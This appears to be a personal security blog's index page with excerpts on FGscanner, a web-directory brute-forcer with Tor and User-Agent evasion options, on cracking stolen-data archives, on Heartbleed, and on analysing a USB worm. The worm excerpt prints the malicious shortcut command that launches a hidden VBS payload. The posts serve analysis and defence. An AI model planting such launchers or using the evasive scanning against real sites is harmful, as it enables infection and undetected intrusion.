FgScanner included in BlackArch Linux

Posted by:

FgScanner has been included in BlackArch Linux. What is BlackArch Linux ?

“BlackArch Linux is a lightweight expansion to Arch Linux for penetration testers and security researchers.

The repository contains 1059 tools. You can install tools individually or in groups. BlackArch is compatible with existing Arch installs. For more information, see the installation instructions. Please note that although BlackArch is past the beta stage, it is still a relatively new project. To report bugs and request new tools, please visit the issue tracker on Github, stop by IRC, or email us.”

FGscanner read the Directories wordlist and analyze the HTTP return code. If the directory exist on the target FGscanner starts reading pages list for a dictionary-based attack. Depending by –dump switch, if the page exists FGscanner dump it on disk.

If you need to avoid detection you can use the advanced features

  • –tor switch to adddress GET requests via TOR network (TOR must be running on your system)
  • –tordns to resolve target via TOR network (otherwise DNS request will be directed to your dns)
  • –sec to slow down the scan or randomize time between requests
  • –uarnd to randomize User-Agent.

Malware related archives decryption using strings command

Posted by:

Cyber attacks landscape is evolving rapidly, reaching high levels of sophistication and complexity in order to exploit and breach enterprises, government entities, universities, financial institutions, etc… even in presence of properly designed and well maintained defense-in-depth strategies. Basically the main stages of a targeted attacks attack can  be summarized in the following five steps:

  • Investigate
  • Infiltrate
  • Explore
  • Exfiltrate
  • Maintain Access

Each stage needs advanced tools and techniques in order to be completed stealthy and often the tools are very specific for each target. In many cases, that tools are created and coded by cybercriminals few hours ago before their deployment in the targeted network to avoid detection systems and signature based analysis. Besides these tools, however, are also used commercial utilities to perform many other activities like encryption, packaging, remote exec, remote access, etc…

RAR and ZIP archives are commonly used to compress and encrypt stolen data during the exfiltration phase of the attack. RAR format is preferred to ZIP thanks to it’s AES-256 encryption, command line utilities for many architectures and operating systems, archive-content encryption, etc…

Very often this archives are generated automatically by malware, scheduled tasks, command line utilities or attackers actions and could be identified by the filename structure in the infected filesystems or after a Forensics Analysis: YEAR_MONTH_DAY_USERID_HOSTNAME.RAR or similar as example.

If the archive content listing is blocked or encrypted, we cannot understand which data are included in the stolen archives and we have to start a password recovery task in order to open the files.
There are several options to achieve the goal:

  • free or commercial tools on a single host
  • commercial tools for distributed tasks over several machines
  • online password recovery services
  • GPU cracking utils
  • hardware acceleration based on FPGA

Each method listed above could require hours, days, months or years to be completed depending on the password length and/or complexity used to protect the files, but we can speed up the process using a very specific dictionary file containing malware-related strings.

Continue Reading →


Windows 8 upgrade: the nightmare begin

Posted by:

Some days ago I was asked to help a friend to choose a new laptop: she explain me her budget, the target applications and her needs. At the end of the scouting process we decide together to buy an Asus N550L notebook.
The configuration is awesome: Intel i7-4500U, 8Gb RAM, 1Tb hard drive at 5400rpm (this is the real bottleneck!!!), Nvidia Geforce 745M with 4Gb, Bluetooth 4.0, aluminium case everything packed in a 15,6″ form factor.

First of all I would like to buy a Windows 7 Professional license and downgrade the system but the vendor told me that Windows 7 is not supported by Asus on N550L. Searching on Asus website I found drivers and utilities for Windows 8 only…….I’m really disappointed about this because I’m quite sure that Windows 7 is not yet in End Of LIfe ! Anyway: I move on B plan and I decide to upgrade to Windows 8.1 Update 1 a suggested by Microsoft in order to work in Desktop mode….I’m sure she will appreciate the “new” look’n’feel…

At 5pm I start the laptop unboxing (the Asus package is very well done and really accurate) and the first Windows setup. I click on the Store box in order to start Windows upgrade, but the system require to have all the last updates installed before start. The first round was composed of about 80 updates…..and require a reboot. The second round was composed of about 20 new updates….and require a reboot….the last round was dedicated to drivers upgrade and require a reboot. Well done, after about 1 hours installing updates and rebooting the laptop I’m finally ready to start the upgrade. I choose the upgrade box in Microsoft Store and the system told me that it needs to download 3,2 Gb ! Really 3,2 Gb ! This is an upgrade ? And what about a fresh install instead ? Crazy…. As probably you know in Italy we are not famous for ADSL broadband connections speed (we are not famous for many others things but doesn’t matter) so the download has required about 2 hours on 7Mbit/s….

Continue Reading →


Cyber threats landscape and defense workshop

Posted by:

The Cyber threats landscape and defense workshop was held April 14th at ISIS “C. Facchinetti” Institute.
The two-hours workshop was intended to illustrate and explain the evolution of cyber threats in the last years and the current scenario.

About 50 participants attend the event and follow the topics explained: from the first virus created in 1971 (Creeper was the first self-replicating program created by Bob Thomas targeting TENEX Operating Systems, but many people believe that Brain was the first virus coded in 1986) until the modern APT (Advanced Persisten Threats) attacks, supported by interactive sessions, a live demo and a great movie produced by TrendMicro (you can watch the entire movie in HD on YouTube).

Today we can all be victims of cyber criminals but we can be a little bit safer if we pay attention to our digital behaviors and we know the threats coming from technologies we are using every day. Security awareness and user behaviors represent one of the most effective defense against cyber crime, probably more than the most advanced security technology. We must protect our data starting from the Layer 8 in a top down approach :)

All the slides displayed during the workshop are now available on SlideShare and accessible directly below.

Feel free to contact me if you have any questions, suggestions or requests.



Heartbleed Testing and Detecting

Posted by:

A critical vulnerability has been identified in OpenSSL versions 1.0.1 – 1.0.1f (CVE-2014-0160) and it is well explained on HeartBleed website. Exploiting the HeartBleed vulnerability. Basically, an attacker can exploit this vulerability to access memory data up to 64Kb and perform many attacks:

  • Read SSL private keys (and use it to decrypt past, present and future encrypted traffic)
  • Retrieve clear text username and passwords
  • Access source code

There are many resources available online to better understand how the bug works and how to fix it (upgrading to OpenSSL version 1.0.1g or newer) as explained on OpenSSL website.

  • Upgrade to OpenSSL 1.0.1g
  • Regenerate your private keys and consider it as compromised
  • Replace SSL certificates
  • If possible upgrade to Perfect Forward Secrecy (PFS)

How can I test if my systems are vulnerable ?

Continue Reading →


Unable to install VMware products

Posted by:

I spent last two months understanding why I was unable to install VMware products on my Windows 7 Professional x64 Workstation: double click on the installer, accept UAC warning….and nothing happens!! No errors, no events in Event Viewer, no process in the task manager…nothing ! I don’t remember how many hours I spent googling for a solution…

One month ago I reinstalled the workstation due some other issues and I was happy to install VMware Workstation, VMware Player and VSphere Client again…but all the products failed to install AGAIN !! I was really frustrated :(

Yesterday I was speaking with an high-skilled IT guy so I asked him about this issue and his answer was “I never had this issue before….really strange!” and we both start again to deep investigate the issue.

We found an useful article on VMware Community forum about similar issue installing VMware Player (https://communities.vmware.com/thread/408832): user Andrè describe the process “fixcamera.exe” as VMware Setup killer: I checked the Task Manager and I have it running on my system ! I killed the process and start the setup again: IT WORKS ! Finally I solved this issue !!!

Continue Reading →


In-depth malware analysis of mmpifmxnth..vbs

Posted by:

Last week I was asked to check a Windows 7 x64 laptop due an extremely poor performances, so as first step I run a complete scan with AntiMalwareBytes free and Avira Antivirus. This two great free software made a great works cleaning more than 170 infected objects!! After the reboot another scan has been started just to be sure that everything was fine and the results confirmed the clean status.
Two days ago the same laptop starts to create strange links on every USB stick plugged so I start a manual analysis of the behavior (unfortunately my Cuckoo Sandbox is building up and not ready yet): using a clean just formatted pen-drive I copied a test folder on the USB and after few seconds that folder was hidden and replaced by a link with the same folder name addressing the following command:
C:\Windows\system32\cmd.exe /c start mmpifmxnth..vbs&start explorer <folder_name>&exit
Continue Reading →


SANS Holiday Challenge 2013 Report

Posted by:

The SANS Holiday Challenge is an high-skilled Ethical Hacking technical exercise sponsored by SANS Cybercon and organized by Counterhack team.
The 2013 edition is the tenth annual installment and the biggest and best ever organized by Ed Skoudis, Josh Wright, & Tom Hessman.

During Christmas Holidays me and Giacomo started to work to the Challenge reading the history and downloading the PCAP file provided by CounterHack team (You can find details and PCAP file on SANS Pen Testing web site). We spent several hours and nightly funny moments investigating the file, producing a detailed analysis of attacks and creating a report that we submit to CounterHack team for validation. We would like also to thank you Mr. GaraNews helped us with Bro and Snort analysis of the PCAP file during my stay in Germany!! :)

Today a blog post on SANS Pen Testing Web Site announce winners and “honorable mentions” of the Holiday Challenge 2013: our report has been referred to as “honorable mention” for the following reasons:

“Andrew and Giacomo had an excellent technical write-up with beautiful formatting, and even went the step further to ask “why” for each of the attacks (correctly citing that Mr. Potter wants to encourage the rapid growth of dental disease in Bedford Falls through manipulating drinking water fluoride levels). The team-of-two even went so far as to evaluate datestamp information in the “Firmware Update” phishing attack, identifying the 5-hour window between the upload of the ab-qfe.exe executable and the retrieval by Don Sawyer.”

Continue Reading →


FGscanner is available for Download

Posted by:

Hi All!
I finally completed FGscanner  :)
FGscanner is a perl script useful for finding directories that are not indexed, hidden pages, development or test folders on a webserver. The script works in dictionary attack mode using two files (fg_dirs and fg_pages) and can be redirect via proxy or tor network if there is a tor daemon running on your system.

The project is hosted on GitHub and you can download it here.

This is the initial release and any comment, contribution or suggestion is more than welcome ! :)


Page 1 of 6 12345...»